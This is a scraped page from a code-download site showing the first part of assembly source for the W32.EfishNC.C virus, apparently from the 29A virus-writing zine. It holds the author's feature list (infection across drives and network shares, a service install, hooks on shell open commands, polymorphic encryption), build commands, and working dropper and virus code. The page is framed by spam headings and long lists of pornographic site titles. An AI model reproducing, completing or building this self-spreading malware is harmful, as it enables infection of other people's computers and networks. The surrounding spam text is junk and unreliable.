亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 29a-7.003

?? 從29A上收集的病毒源碼
?? 003
?? 第 1 頁 / 共 5 頁
字號:

comment ;)
W32.EfishNC.C by roy g biv

some of its features:
- parasitic resident (own process) infector of PE exe (but not looking at suffix)
- infects files in all directories on all fixed and network drives and network shares
- directory traversal is linked-list instead of recursive to reduce stack size
- enumerates shares on local network and also random IP addresses
- reloc section inserter/last section appender
- runs as service in NT/2000/XP and service process in 9x/Me
- hooks all executable shell\open\command values
- EPO and xlat (unbreakable!) encryption with polymorphic decryptor
- auto function type selection (Unicode under NT/2000/XP, ANSI under 9x/Me)
- uses CRCs instead of API names
- uses SEH for common code exit
- section attributes are never altered (virus is self-modifying but runs on stack)
- no infect files with data outside of image (eg self-extractors)
- infected files are padded by random amounts to confuse tail scanners
- uses SEH walker to find kernel address (no hard-coded addresses)
- correct file checksum without using imagehlp.dll :) 100% correct algorithm
- plus some new code optimisations that were never seen before :)
---

  optimisation tip: Windows appends ".dll" automatically, so this works:
        push "cfs"
        push esp
        call LoadLibraryA
---

to build this thing:
tasm
----
tasm32 /ml /m3 efishnc
tlink32 /B:400000 /x efishnc,,,import32

Virus is not self-modifying, so no need to alter section attributes
---

We're in the middle of a phase transition:
a butterfly flapping its wings at
just the right moment could
cause a storm to happen.
-I'm trying to understand-
I'm at a moment in my life-
I don't know where to flap my wings.
(Danny Hillis)

(;

.486
.model  flat

extern  GetCurrentProcess:proc
extern  WriteProcessMemory:proc
extern  MessageBoxA:proc
extern  ExitProcess:proc

.data

;must be reverse alphabetical order because they are stored on stack
;API names are not present in replications, only in dropper

expnames        db      "WriteProcessMemory"  , 0
                db      "WriteFile"           , 0
                db      "WinExec"             , 0
                db      "SetFileAttributesA"  , 0
                db      "MoveFileA"           , 0
                db      "LoadLibraryA"        , 0
                db      "GlobalFree"          , 0
                db      "GlobalAlloc"         , 0
                db      "GetWindowsDirectoryA", 0
                db      "GetTickCount"        , 0
                db      "GetTempFileNameA"    , 0
                db      "GetFileAttributesA"  , 0
                db      "GetCurrentProcess"   , 0
                db      "DeleteFileA"         , 0
                db      "CreateFileA"         , 0
                db      "CloseHandle"         , 0

regnames        db      "RegSetValueA"      , 0
                db      "OpenSCManagerA"    , 0
                db      "CreateServiceA"    , 0
                db      "CloseServiceHandle", 0

exenames        db      "LoadLibraryA"   , 0
                db      "GetVersion"     , 0
                db      "GetTickCount"   , 0
                db      "GetStartupInfoW", 0
                db      "GetStartupInfoA", 0
                db      "GetCommandLineW", 0
                db      "GetCommandLineA", 0
                db      "ExitProcess"    , 0
                db      "CreateProcessW" , 0
                db      "CreateProcessA" , 0

usrnames        db      "CharNextW", 0
                db      "CharNextA", 0

svcnames        db      "StartServiceCtrlDispatcherA", 0

krnnames        db      "lstrlenW"            , 0
                db      "lstrcpyW"            , 0
                db      "lstrcatW"            , 0
                db      "UnmapViewOfFile"     , 0
                db      "Sleep"               , 0
                db      "SetFileTime"         , 0
                db      "SetFileAttributesW"  , 0
                db      "SetFileAttributesA"  , 0
                db      "SetCurrentDirectoryW", 0
                db      "SetCurrentDirectoryA", 0
                db      "MultiByteToWideChar" , 0
                db      "MapViewOfFile"       , 0
                db      "LoadLibraryA"        , 0
                db      "GlobalFree"          , 0
                db      "GlobalAlloc"         , 0
                db      "GetVersion"          , 0
                db      "GetTickCount"        , 0
                db      "GetFullPathNameW"    , 0
                db      "GetFullPathNameA"    , 0
                db      "GetDriveTypeA"       , 0
                db      "FindNextFileW"       , 0
                db      "FindNextFileA"       , 0
                db      "FindFirstFileW"      , 0
                db      "FindFirstFileA"      , 0
                db      "FindClose"           , 0
                db      "CreateThread"        , 0
                db      "CreateFileW"         , 0
                db      "CreateFileMappingA"  , 0
                db      "CreateFileA"         , 0
                db      "CloseHandle"         , 0

sfcnames        db      "SfcIsFileProtected", 0

netnames        db      "WNetOpenEnumW"    , 0
                db      "WNetOpenEnumA"    , 0
                db      "WNetEnumResourceW", 0
                db      "WNetEnumResourceA", 0
                db      "WNetCloseEnum"    , 0

ip9xnames       db      "NetShareEnum", 0

ipntnames       db      "NetShareEnum"    , 0
                db      "NetApiBufferFree", 0

txttitle        db      "EfishNC", 0
txtbody         db      "running...", 0

include efishnc.inc

.code
dropper         label   near
        mov     edx, expcrc_count
        mov     ebx, offset expnames
        mov     edi, offset expcrcbegin
        call    create_crcs
        mov     edx, regcrc_count
        mov     ebx, offset regnames
        mov     edi, offset regcrcbegin
        call    create_crcs
        mov     edx, execrc_count
        mov     ebx, offset exenames
        mov     edi, offset execrcbegin
        call    create_crcs
        mov     edx, usrcrc_count
        mov     ebx, offset usrnames
        mov     edi, offset usrcrcbegin
        call    create_crcs
        mov     edx, svccrc_count
        mov     ebx, offset svcnames
        mov     edi, offset svccrcbegin
        call    create_crcs
        mov     edx, krncrc_count
        mov     ebx, offset krnnames
        mov     edi, offset krncrcbegin
        call    create_crcs
        mov     edx, sfccrc_count
        mov     ebx, offset sfcnames
        mov     edi, offset sfccrcbegin
        call    create_crcs
        mov     edx, netcrc_count
        mov     ebx, offset netnames
        mov     edi, offset netcrcbegin
        call    create_crcs
        mov     edx, ip9xcrc_count
        mov     ebx, offset ip9xnames
        mov     edi, offset ip9xcrcbegin
        call    create_crcs
        mov     edx, ipntcrc_count
        mov     ebx, offset ipntnames
        mov     edi, offset ipntcrcbegin
        call    create_crcs

restore_loc     label   near
        pushad
        enter   0, 0
        jmp     efishnc_inf
        db      decsize - (offset $ - offset restore_loc) dup ('r')
        xor     ebx, ebx
        push    ebx
        push    offset txttitle
        push    offset txtbody
        push    ebx
        call    MessageBoxA
        push    ebx
        call    ExitProcess

create_crcs     proc    near
        imul    ebp, edx, 4

create_loop     label   near
        or      eax, -1

create_outer    label   near
        xor     al, byte ptr [ebx]
        push    8
        pop     ecx

create_inner    label   near
        add     eax, eax
        jnb     create_skip
        xor     eax, 4c11db7h                   ;use generator polymonial (see IEEE 802)

create_skip     label   near
        loop    create_inner
        sub     cl, byte ptr [ebx]              ;carry set if not zero
        inc     ebx                             ;carry not altered by inc
        jb      create_outer
        push    eax
        dec     edx
        jne     create_loop
        mov     eax, esp
        push    ecx
        push    ebp
        push    eax
        push    edi
        call    GetCurrentProcess
        push    eax
        xchg    esi, eax
        call    WriteProcessMemory
        add     esp, ebp
        ret
create_crcs     endp

;-----------------------------------------------------------------------------
;everything before this point is dropper code
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;virus code begins here in infected files
;-----------------------------------------------------------------------------

efishnc_inf     proc    near
        cld                                     ;decryptor can set D flag
        call    walk_seh

;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------

expcrcbegin     label   near                    ;place < 80h bytes from call for smaller code
        dd      (expcrc_count + 1) dup (0)
expcrcend       label   near
        dd      offset drop_exp - offset expcrcend + 4
        db      "EfishNC - roy g biv"           ;better, stronger, faster

walk_seh        label   near
        xor     esi, esi
        lods    dword ptr fs:[esi]
        inc     eax

seh_loop        label   near
        dec     eax
        xchg    esi, eax
        lods    dword ptr [esi]
        inc     eax
        jne     seh_loop
        lods    dword ptr [esi]

;-----------------------------------------------------------------------------
;moved label after some data because "e800000000" looks like virus code ;)
;-----------------------------------------------------------------------------

init_findmz     label   near
        inc     eax
        xchg    edi, eax

find_mzhdr      label   near

;-----------------------------------------------------------------------------
;do not use hard-coded kernel address values because it is not portable
;Microsoft used all different values for 95, 98, NT, 2000, Me, XP
;they will maybe change again for every new release
;-----------------------------------------------------------------------------

        dec     edi                             ;sub 64kb
        xor     di, di                          ;64kb align
        call    is_pehdr
        jne     find_mzhdr
        mov     ebx, edi
        pop     edi

;-----------------------------------------------------------------------------
;parse export table
;-----------------------------------------------------------------------------

        mov     esi, dword ptr [esi + pehdr.peexport.dirrva - pehdr.pecoff]
        lea     esi, dword ptr [ebx + esi + peexp.expordbase]
        lods    dword ptr [esi]                 ;Ordinal Base
        lea     ebp, dword ptr [eax * 2 + ebx]
        lods    dword ptr [esi]
        lods    dword ptr [esi]
        lods    dword ptr [esi]                 ;Export Address Table RVA
        lea     edx, dword ptr [ebx + eax]
        lods    dword ptr [esi]                 ;Name Pointer Table RVA
        add     ebp, dword ptr [esi]            ;Ordinal Table RVA
        lea     ecx, dword ptr [ebx + eax]
        mov     esi, ecx

push_export     label   near
        push    ecx

get_export      label   near
        lods    dword ptr [esi]
        push    ebx
        add     ebx, eax                        ;Name Pointer VA
        or      eax, -1

crc_outer       label   near
        xor     al, byte ptr [ebx]
        push    8
        pop     ecx

crc_inner       label   near
        add     eax, eax
        jnb     crc_skip
        xor     eax, 4c11db7h                   ;use generator polymonial (see IEEE 802)

crc_skip        label   near
        loop    crc_inner
        sub     cl, byte ptr [ebx]              ;carry set if not zero
        inc     ebx                             ;carry not altered by inc
        jb      crc_outer
        pop     ebx

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美精品1区2区3区| 欧美电影免费观看高清完整版| 欧洲人成人精品| 成人激情校园春色| 一本色道久久综合精品竹菊| 日韩天堂在线观看| 国产精品伦一区| 亚洲国产日韩综合久久精品| 国产综合久久久久久久久久久久| 99这里都是精品| 欧美一区二区在线免费播放| 欧美国产丝袜视频| 日本中文字幕一区二区视频| 成人网在线播放| 欧美精品久久久久久久久老牛影院| 久久影院午夜片一区| 亚洲一区二区免费视频| 国产成人精品在线看| 欧美日韩精品欧美日韩精品一 | 一本久久a久久精品亚洲| 69久久夜色精品国产69蝌蚪网| 精品日韩在线一区| 一区二区三区电影在线播| 久久99国内精品| 欧美三级电影网| 国产精品久久久久久久久免费桃花| 日韩国产欧美一区二区三区| 91小宝寻花一区二区三区| 日韩一区二区中文字幕| 亚洲成av人综合在线观看| 91麻豆福利精品推荐| 91精品久久久久久蜜臀| 一区二区三区欧美视频| 岛国精品一区二区| 26uuu成人网一区二区三区| 日韩高清在线电影| 欧美三级一区二区| 亚洲午夜电影在线| 波多野结衣视频一区| 久久精品视频免费观看| 精品一区二区国语对白| 91精品国产一区二区人妖| 亚洲动漫第一页| 色av一区二区| 一区二区三区在线观看国产| 成人免费的视频| 久久久久久久久久久99999| 久久精品久久久精品美女| 91精品国产福利| 免费观看一级特黄欧美大片| 欧美老肥妇做.爰bbww| 五月激情综合婷婷| 7878成人国产在线观看| 日本中文字幕一区| 91精品国产综合久久久蜜臀粉嫩| 午夜欧美大尺度福利影院在线看| 欧美在线免费播放| 亚洲国产欧美日韩另类综合| 欧美日本乱大交xxxxx| 伊人夜夜躁av伊人久久| 91丨porny丨中文| 亚洲一区二区三区中文字幕在线| 欧美日韩精品一区二区天天拍小说 | 久久超碰97人人做人人爱| 精品少妇一区二区三区免费观看 | 国产精品伦理在线| 99国产精品久久久| 蜜臀av性久久久久蜜臀aⅴ四虎 | 一个色综合av| 欧美刺激脚交jootjob| 91香蕉视频mp4| 日本一不卡视频| 亚洲区小说区图片区qvod| 欧美伊人久久久久久午夜久久久久| 日本欧美久久久久免费播放网| 亚洲国产高清aⅴ视频| 777久久久精品| 99国产精品国产精品久久| 久久成人久久爱| 亚洲电影激情视频网站| 日韩一区欧美小说| 欧美成人国产一区二区| 91久久精品国产91性色tv| 国产乱子伦视频一区二区三区 | 亚洲成人精品在线观看| 国产午夜精品久久久久久久 | 亚洲欧洲av一区二区三区久久| 91精品久久久久久久91蜜桃| 色综合久久综合网97色综合| 国产经典欧美精品| 日韩精品亚洲一区二区三区免费| 亚洲视频你懂的| 国产亚洲欧美一级| 日韩精品在线看片z| 精品视频在线免费看| 91年精品国产| 成人免费高清视频| 国产成人精品免费网站| 久久 天天综合| 日本成人在线电影网| 亚洲妇女屁股眼交7| 亚洲美女淫视频| 亚洲欧美日韩在线| 国产精品成人在线观看| 亚洲国产精品激情在线观看| www国产精品av| 精品国产麻豆免费人成网站| 欧美成人一区二区三区在线观看| 欧美一区二区福利在线| 欧美一区在线视频| 日韩一级二级三级精品视频| 欧美高清视频www夜色资源网| 欧美色图免费看| 在线亚洲精品福利网址导航| 欧美在线一区二区三区| 欧美日韩国产综合一区二区三区| 欧美专区日韩专区| 在线一区二区三区做爰视频网站| 91麻豆免费在线观看| 在线亚洲+欧美+日本专区| 欧美日韩国产一级片| 91精品蜜臀在线一区尤物| 欧美一级片在线| 欧美不卡一区二区三区四区| 精品久久久久久久久久久久包黑料 | 国产精品国产三级国产专播品爱网 | 亚洲第一主播视频| 午夜激情综合网| 久久精品国产**网站演员| 国模大尺度一区二区三区| 国产一二三精品| av一本久道久久综合久久鬼色| 91在线高清观看| 717成人午夜免费福利电影| 亚洲精品一区二区在线观看| 久久久久久久久97黄色工厂| 中文字幕欧美一区| 性做久久久久久| 国产综合久久久久久鬼色| 成人免费av网站| 91视频国产观看| 日韩一区二区中文字幕| 中文字幕乱码日本亚洲一区二区| 一区二区三区在线免费| 三级在线观看一区二区| 国产成人精品影视| 欧美午夜影院一区| xfplay精品久久| 亚洲免费在线电影| 美女脱光内衣内裤视频久久影院| 成人性色生活片| 欧美日韩视频在线观看一区二区三区| 日韩精品一区二区三区在线| 中文字幕一区在线观看视频| 日韩中文字幕一区二区三区| 国产成人精品一区二| 欧美四级电影在线观看| 2014亚洲片线观看视频免费| 亚洲一区二区三区小说| 国产麻豆精品在线| 欧美人动与zoxxxx乱| 国产精品视频免费| 久久精品国产色蜜蜜麻豆| 色综合色狠狠综合色| 国产视频一区在线观看| 天天综合天天综合色| 91麻豆精品在线观看| 久久精品亚洲一区二区三区浴池| 亚洲成人午夜影院| av午夜精品一区二区三区| 精品国产一区二区三区不卡| 亚洲高清不卡在线观看| 99国产欧美另类久久久精品| 国产午夜亚洲精品午夜鲁丝片| 欧美aaa在线| 欧美又粗又大又爽| 中文字幕五月欧美| 成人网男人的天堂| 久久久影视传媒| 国产在线精品一区二区三区不卡 | 欧美狂野另类xxxxoooo| 日韩美女视频19| 成人黄色在线网站| 久久青草欧美一区二区三区| 久久精品国产免费看久久精品| 在线一区二区视频| 亚洲欧美激情小说另类| 不卡av电影在线播放| 国产女人aaa级久久久级| 韩国av一区二区三区| 日韩欧美国产麻豆| 老司机午夜精品99久久| 欧美一级理论片| 蜜臀精品一区二区三区在线观看| 欧美日韩国产成人在线91| 亚洲成人动漫av| 91精品国产综合久久久蜜臀图片 | 亚洲一区二区欧美| 欧洲国内综合视频| 亚洲黄色av一区|